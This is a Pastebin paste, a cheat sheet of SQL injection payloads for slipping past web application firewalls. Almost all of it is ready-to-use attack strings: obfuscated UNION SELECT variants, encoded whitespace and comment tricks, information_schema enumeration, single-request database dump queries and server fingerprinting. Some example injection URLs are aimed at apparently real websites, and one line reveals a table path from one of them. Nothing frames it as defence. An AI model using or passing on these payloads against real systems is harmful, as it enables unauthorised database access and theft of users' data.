
WAF Bypass sqli

Mar 22nd, 2016
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 13.80 KB | None | 0 0
  1. WAF evasion methods for sql Injections
  3. I want to share WAF evasion methods for sql Injections. Most are old but few are newer. You can bypass most of the "404 forbidden" and "NOT Acceptable" errors by these methods.
  5. 1) id=1+UnIoN+SeLecT 1,2,3 --+
  7. 2) id=1+UnIOn/**/SeLect 1,2,3 --+
  9. 3) id=1+UNIunionON+SELselectECT 1,2,3 --+
  11. 4) id=1+/*!UnIOn*/+/*!sElEcT*/ 1,2,3 --+
  13. 5) id=1 and (select 1)=(Select 0xAA 1000 more A’s)+UnIoN+SeLeCT 1,2,3 --+
  15. 6) id=1+%23hihihi%0aUnIOn%23hihihi%0aSeLecT+1,2 ,3 --+
  17. 7) id=1+UnIOn%0d%0aSeleCt%0d%0a1,2,3 --+
  19. 8) Id=1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C1,2,3 --+
  21. /*!fuckU%0d%0aunion*/+/*!fuckU%0d%0aSelEct*/ 1,2,3 --+
  23. 9) Id=1/*!fuckU%0d%0aunion*/+/*!fuckU%0d%0aSelEct*/ 1,2,3 --+
  25. div + 0
  26. Having +1 = 0
  27. AND+ 1 = 0
  28. /*!and*/ +1 = 0
  29. and( 1 )=(0 ) x
  30. OR false the url query
  31. id =- 1 union all select
  32. id =null union all select
  33. id =1 +and+ false + union +all +select
  34. id = 9999 union all select
  36. +union+distinct+select+
  37. +union+distinctROW+select+
  38. /**//*!12345UNION SELECT*//**/
  39. /**//*!50000UNION SELECT*//
  41. http : //'
  42. +and(1)=(0) +union+distinct+select+ 1
  43. and use: and 1=0 to apear column number in the page
  44. or
  45. +div+0
  46. Having+1=0
  47. +AND+1=0
  48. +/*!and*/+1=0
  49. and(1)=(0‏)
  51. Hard WAF bypass tips
  52. Whitespaces :
  53. union(select(0),version(),(0),(0),(0),(0),(0),(0),
  54. (0))
  55. %0Aunion%0Aselect%0A1,2,3--
  56. /**/union/**/select/**/1,2,3--
  57. like ::
  58. PHP Code:
  59. http ://
  60. list_itinerary.php?id=-4%20union
  61. %20%28select%201,2,version
  62. %28%29,4,5,6,7,8%29%20--
  63. =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
  68. =-=-=-=-=-=-=-=-=-=-=-=-=-=-
  69. Bypassing ::
  70. (Double Keyword): UNIunionON+SELselectECT
  71. +union+distinct+select+
  72. +union+distinctROW+select+
  73. union+/*!select*/+1,2,3
  74. union/**/select/**/1,2,3
  75. uni<on all sel<ect
  76. %20union%20/*!select*/%20
  77. /**//*!union*//**//*!select*//**/
  78. union%23aa%0Aselect
  79. /**/union/*!50000select*/
  80. /*!20000%0d%0aunion*/+/*!20000%0d
  81. %0aSelEct*/
  82. %252f%252a*/UNION%252f%252a /SELECT%252f
  83. %252a*/
  84. +%23sexsexsex%0AUnIOn%23sexsexsex
  85. %0ASeLecT+
  86. id=1+’UnI”On’+'SeL”ECT’ <-MySQL only
  87. id=1+'UnI'||'on'+SeLeCT' <-MSSQL only
  88. like ::
  89. PHP Code:
  90. http ://
  91. list_itinerary.php?id=-4%20union
  92. %23aa%0Aselect%201,2,version
  93. %28%29,4,5,6,7,8%20--
  94. PHP Code:
  95. http ://
  96. list_itinerary.php?id=-4%20/**/
  97. union/*!50000select*/
  98. %201,2,version
  99. %28%29,4,5,6,7,8%20--
  100. PHP Code:
  101. http ://
  102. list_itinerary.php?id=-4%20/*!
  103. 20000%0d%0aunion*/+/*!20000%0d
  104. %0aSelEct*/%201,2,version
  105. %28%29,4,5,6,7,8%20--
  106. =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
  107. =-=-=-=-=-=-=-=-=-=-=-=-=-=-
  108. after id no. like id=1 +/*!and*/+1=0
  109. +div+0
  110. Having+1=0
  111. +AND+1=0
  112. +/*!and*/+1=0
  113. and(1)=(0)
  114. =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
  115. =-=-=-=-=-=-=-=-=-=-=-=-=-=-
  116. false the url query :
  117. =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
  118. =-=-=-=-=-=-=-=-=-=-=-=-=-=-
  119. id= - 1 union all select
  120. id= null union all select
  121. id=1 +and+false+ union+all+select
  122. id= 9999 union all select
  123. =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
  124. =-=-=-=-=-=-=-=-=-=-=-=-=-=-
  125. Order Bypassing do like this
  126. =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
  127. =-=-=-=-=-=-=-=-=-=-=-=-=-=-
  128. /*!table_name*/
  129. +from /*!information_schema*/./*!tables*/ where
  130. table_schema=database()
  131. =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
  132. =-=-=-=-=-=-=-=-=-=-=-=-=-=-
  133. unhex(hex(Concat
  134. (Column_Name,0x3e,Table_schema,0x3e,table_
  135. Name)))
  136. /*!from*/information_schema.columns/*!where*/
  137. column_name%20/*!like*/char(37,%20112,%2097,
  138. %20115,%20115,%2037)
  139. like ::
  140. PHP Code:
  141. http ://
  142. article.php?
  143. article_id=-117%20union%20select
  144. %201,2,unhex%28hex%28Concat
  145. %28Column_Name,0x3e,Table_
  146. schema, 0x3e,table_Name
  147. %29%29%29,4,5,6,7/*!from*/
  148. information_schema.columns/*!
  149. where*/column_name%20/*!like*/
  150. char%2837,%20112,%2097,%20115,
  151. %20115,%2037%29--
  152. user_passwd>westbur6_website>user_info
  153. =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
  154. =-=-=-=-=-=-=-=-=-=-=-=-=-=-
  155. used with order ::
  156. convert( using ascii) or unhex(hex())
  157. like :
  158. PHP Code:
  159. www. westbury. com/ article. php?
  160. article_id =- 117 union select 1 , 2 ,
  161. convert ( group_concat
  162. (table_name ) using ascii ), 4 , 5 ,6 , 7 +
  163. from +information_schema .tables --
  164. IF'ascii' dosent work? you can try
  165. PHP Code:
  166. ujis
  167. ucs2
  168. tis620
  169. swe7
  170. sjis
  171. macroman
  172. macce
  173. latin7
  174. latin5
  175. latin2
  176. koi8u
  177. koi8r
  178. keybcs2
  179. hp8
  180. geostd8
  181. gbk
  182. gb2132
  183. armscii8
  184. ascii
  185. binary
  186. cp1250
  187. big5
  188. cp1251
  189. cp1256
  190. cp1257
  191. cp850
  193. ------------------------------Best Bypass WAF------------------------------------
  195. [~] order by [~]
  196. /**/ORDER/**/BY/**/
  197. /*!order*/+/*!by*/
  198. /*!ORDER BY*/
  199. /*!50000ORDER BY*/
  200. /*!50000ORDER*//**//*!50000BY*/
  201. /*!12345ORDER*/+/*!BY*/
  203. [~] UNION select [~]
  204. /*!50000%55nIoN*/ /*!50000%53eLeCt*/
  205. %55nion(%53elect 1,2,3)-- -
  206. +union+distinct+select+
  207. +union+distinctROW+select+
  208. /**//*!12345UNION SELECT*//**/
  209. /**//*!50000UNION SELECT*//**/
  210. /**/UNION/**//*!50000SELECT*//**/
  211. /*!50000UniON SeLeCt*/
  212. union /*!50000%53elect*/
  213. + #?uNiOn + #?sEleCt
  214. + #?1q %0AuNiOn all#qa%0A#%0AsEleCt
  215. /*!%55NiOn*/ /*!%53eLEct*/
  216. /*!u%6eion*/ /*!se%6cect*/
  217. +un/**/ion+se/**/lect
  218. uni%0bon+se%0blect
  219. %2f**%2funion%2f**%2fselect
  220. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  221. REVERSE(noinu)+REVERSE(tceles)
  222. /*--*/union/*--*/select/*--*/
  223. union (/*!/**/ SeleCT */ 1,2,3)
  224. /*!union*/+/*!select*/
  225. union+/*!select*/
  226. /**/union/**/select/**/
  227. /**/uNIon/**/sEleCt/**/
  228. +%2F**/+Union/*!select*/
  229. /**//*!union*//**//*!select*//**/
  230. /*!uNIOn*/ /*!SelECt*/
  231. +union+distinct+select+
  232. +union+distinctROW+select+
  233. uNiOn aLl sElEcT
  234. UNIunionON+SELselectECT
  235. /**/union/*!50000select*//**/
  236. 0%a0union%a0select%09
  237. %0Aunion%0Aselect%0A
  238. %55nion/**/%53elect
  239. uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  240. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  241. %0A%09UNION%0CSELECT%10NULL%
  242. /*!union*//*--*//*!all*//*--*//*!select*/
  243. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  244. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  245. +UnIoN/*&a=*/SeLeCT/*&a=*/
  246. union+sel%0bect
  247. +uni*on+sel*ect+
  248. +#1q%0Aunion all#qa%0A#%0Aselect
  249. union(select (1),(2),(3),(4),(5))
  250. UNION(SELECT(column)FROM(table))
  251. %23xyz%0AUnIOn%23xyz%0ASeLecT+
  252. %23xyz%0A%55nIOn%23xyz%0A%53eLecT+
  253. union(select(1),2,3)
  254. union (select 1111,2222,3333)
  255. uNioN (/*!/**/ SeleCT */ 11)
  256. union (select 1111,2222,3333)
  257. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
  258. /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
  259. %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
  260. +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
  261. +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  262. /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
  263. +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
  264. /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
  265. /union\sselect/g
  266. /union\s+select/i
  267. /*!UnIoN*/SeLeCT
  268. +UnIoN/*&a=*/SeLeCT/*&a=*/
  269. +uni>on+sel>ect+
  270. +(UnIoN)+(SelECT)+
  271. +(UnI)(oN)+(SeL)(EcT)
  272. +’UnI”On’+'SeL”ECT’
  273. +uni on+sel ect+
  274. +/*!UnIoN*/+/*!SeLeCt*/+
  275. /*!u%6eion*/ /*!se%6cect*/
  276. uni%20union%20/*!select*/%20
  277. union%23aa%0Aselect
  278. /**/union/*!50000select*/
  279. /^.*union.*$/ /^.*select.*$/
  280. /*union*/union/*select*/select+
  281. /*uni X on*/union/*sel X ect*/
  282. +un/**/ion+sel/**/ect+
  283. +UnIOn%0d%0aSeleCt%0d%0a
  284. UNION/*&test=1*/SELECT/*&pwn=2*/
  285. un?<ion sel="">+un/**/ion+se/**/lect+
  286. +UNunionION+SEselectLECT+
  287. +uni%0bon+se%0blect+
  288. %252f%252a*/union%252f%252a /select%252f%252a*/
  289. /%2A%2A/union/%2A%2A/select/%2A%2A/
  290. %2f**%2funion%2f**%2fselect%2f**%2f
  291. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  292. /*!UnIoN*/SeLecT+
  294. [~] information_schema.tables [~]
  295. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
  296. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
  297. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
  298. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
  299. /*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
  300. /*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
  302. [~] concat() [~]
  303. CoNcAt()
  304. concat()
  305. CON%08CAT()
  306. CoNcAt()
  307. %0AcOnCat()
  308. /**//*!12345cOnCat*/
  309. /*!50000cOnCat*/(/*!*/)
  310. unhex(hex(concat(table_name)))
  311. unhex(hex(/*!12345concat*/(table_name)))
  312. unhex(hex(/*!50000concat*/(table_name)))
  314. [~] group_concat() [~]
  315. /*!group_concat*/()
  316. gRoUp_cOnCAt()
  317. group_concat(/*!*/)
  318. group_concat(/*!12345table_name*/)
  319. group_concat(/*!50000table_name*/)
  320. /*!group_concat*/(/*!12345table_name*/)
  321. /*!group_concat*/(/*!50000table_name*/)
  322. /*!12345group_concat*/(/*!12345table_name*/)
  323. /*!50000group_concat*/(/*!50000table_name*/)
  324. /*!GrOuP_ConCaT*/()
  325. /*!12345GroUP_ConCat*/()
  326. /*!50000gRouP_cOnCaT*/()
  327. /*!50000Gr%6fuP_c%6fnCAT*/()
  328. unhex(hex(group_concat(table_name)))
  329. unhex(hex(/*!group_concat*/(/*!table_name*/)))
  330. unhex(hex(/*!12345group_concat*/(table_name)))
  331. unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
  332. unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
  333. unhex(hex(/*!50000group_concat*/(table_name)))
  334. unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
  335. unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
  336. convert(group_concat(table_name)+using+ascii)
  337. convert(group_concat(/*!table_name*/)+using+ascii)
  338. convert(group_concat(/*!12345table_name*/)+using+ascii)
  339. convert(group_concat(/*!50000table_name*/)+using+ascii)
  340. CONVERT(group_concat(table_name)+USING+latin1)
  341. CONVERT(group_concat(table_name)+USING+latin2)
  342. CONVERT(group_concat(table_name)+USING+latin3)
  343. CONVERT(group_concat(table_name)+USING+latin4)
  344. CONVERT(group_concat(table_name)+USING+latin5)
  345. Group_Concat
  346. group_concat ()
  347. /*!group_concat*/ ()
  348. grOUp_ConCat ( /*!*/ , 0x3e , /*!*/ )
  349. group_concat (, 0x3c62723e )
  350. g % 72oup_c % 6Fncat % 28 % 76% 65rsion
  351. % 28 %29 ,% 22 ~ BlackRose% 22 %29
  352. CoNcAt ()
  353. CONCAT (DISTINCT Version ())
  354. concat (, 0x3a ,)
  355. concat %00 ()
  356. % 00CoNcAt ()
  357. /*!50000cOnCat*/ ( /*!Version()*/ )
  358. /*!50000cOnCat*/
  359. /**//*!12345cOnCat*/ (, 0x3a ,)
  360. concat_ws ()
  361. concat (0x3a ,, 0x3c62723e )
  362. /*!concat_ws(0x3a,)*/
  363. concat_ws ( 0x3a3a3a , version()
  364. CONCAT_WS ( CHAR ( 32, 58, 32 ), version
  365. (),)
  366. REVERSE( tacnoc )
  367. binary (version ())
  368. uncompress (compress ( version()))
  369. aes_decrypt ( aes_encrypt ( version
  370. (), 1), 1 )[/ b ][/ u ][/ size ][/ color ]
  372. [~] after id no. like id=1 +/*!and*/+1=0 [~]
  373. +div+0
  374. Having+1=0
  375. +AND+1=0
  376. +/*!and*/+1=0
  377. and(1)=(0)
  378. cp852
  379. cp866
  380. cp932
  381. dec8
  382. euckr
  383. latin1
  384. utf8
  385. trick to appear info inside img tag
  386. PHP Code:
  387. concat( 0x223e3c62723e ,, 0x3c696d
  388. 67207372633d22 )
  389. when the column is get into html tag,but its not
  390. always inside img tag.
  391. it could be <a> or </noscript> or anything.
  392. like ::
  393. PHP Code:
  394. http ://
  395. public/detail.php?
  396. id=-168' union /*!
  397. %53elect*/ concat
  398. (0x223e3c2f613e3c2f74643e,
  399. version
  400. (),0x3c6120687265663d22)--+
  402. [DUMP DB in 1 Request]
  403. PHP Code:
  404. ( select (@) from ( select(@:= 0x00 ),
  405. ( select (@) from ( information_schema . columns) where ( table_schema >=@) and (@) in (@:= concat
  406. (@, 0x0a , ' [ ' ,table_schema , ' ] >' , table_name , ' > ' , column_name )))) x )
  407. ( select(@) from ( select (@:= 0x00 ),
  408. ( select (@) from ( table ) where (@) in (@:= concat
  409. (@, 0x0a , column1 , 0x3a , column2 )))) a )
  411. [DUMP DB in 1 Request improve]
  412. PHP Code:
  413. ( select(@ x ) from (select (@x := 0x00 ),
  414. ( select( 0 ) from
  415. ( information_schema . columns) where
  416. ( table_schema !
  417. = 0x696e666f726d6174696f6e5f736368656d61 )and
  418. ( 0x00 ) in(@ x := concat
  419. (@ x ,0x3c62723e , table_schema , 0x2e , table_name , 0x3a , column_name )))) x )
  420. like
  421. http : //
  422. id=-13 union select 1,2,(select
  423. (@x)from(select(@x:=0x00),(select
  424. (0)from(information_schema.colu​​
  425. mns)where(table_schema!
  426. =0x696e666f726d6174696f6e5f736368656d61)and
  427. (0x00)in(@x:=​c​oncat
  428. (@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4,5 --
  431. %09 %0A %0B %0C %0D %A0
  432. get version - DB_NAME - user - HOST_NAME -
  433. datadir
  434. PHP Code:
  435. version()
  436. convert( version() using latin1 )
  437. unhex ( hex( version()))
  439. ( substr
  440. (@@version ,1 , 1 )=5 ) :: 1 true 0 fals
  441. # like #
  442. www. marinaplast. com/ page . php?
  443. id =- 13 union select 1 , 2 ,( substr
  444. (@@version ,1 , 1 )=5 ), 4, 5 --
  445. 1 it 's mean version 5 and 0 mean version 4
  446. +and substring(version(),1,1)=4
  447. +and substring(version(),1,1)=5
  448. +and substring(version(),1,1)=9
  449. +and substring(version(),1,1)=10
  450. # like #
  452. id=13+and substring(version
  453. (),1,1)=5
  454. download good version 5
  456. id=13+and substring(version
  457. (),1,1)=4
  458. not download good version 4
  459. version 5
  460. id=1 /*!50094aaaa*/ error
  461. id=1 /*!50095aaaa*/ no error
  462. id=1 /*!50096aaaa*/ error
  463. # like #
  464. /
  465. *!50095aaaa*/ no error v5
  466. version 4
  467. id=1 /*!40123 1=1*/--+- no error
  468. id=1 /*!40122rrrr*/ no error
  469. # like #
  470. /
  471. *!40122rrrr*/ error not v4
  472. ☆¸.•*☆ ☆*•.¸☆
  473. DB_NAME()
  474. @@database
  475. database()
  476. id=vv()
  477. # like #
  479. id=-13 union select 1,2,DB_NAME
  480. (),4,5 --
  482. ()
  483. ☆¸.•*☆ ☆*•.¸☆
  484. @@user
  485. user()
  486. user_name()
  487. system_user()
  488. # like #
  490. id=-13 union select 1,2,user
  491. (),4,5 --
  492. ☆¸.•*☆ ☆*•.¸☆
  493. HOST_NAME()
  494. @@hostname
  495. @@servername
  497. # like #
  499. id=-13 union select 1,2,HOST_NAME
  500. (),4,5 --
  501. ☆¸.•*☆ ☆*•.¸☆
  502. @@datadir
  503. datadir()
  504. # like #
  506. id=-13 union select 1,2,datadir(),4,5 --
  507. ☆¸.•*☆ ☆*•.¸☆
  508. ASPX
  509. and 1=0/@@version
  510. ' and 1 =0 /@@ version;--
  511. ) and 1 =@@version--
  512. and 1 = 0 /user ;--
Add Comment
Please, Sign In to add comment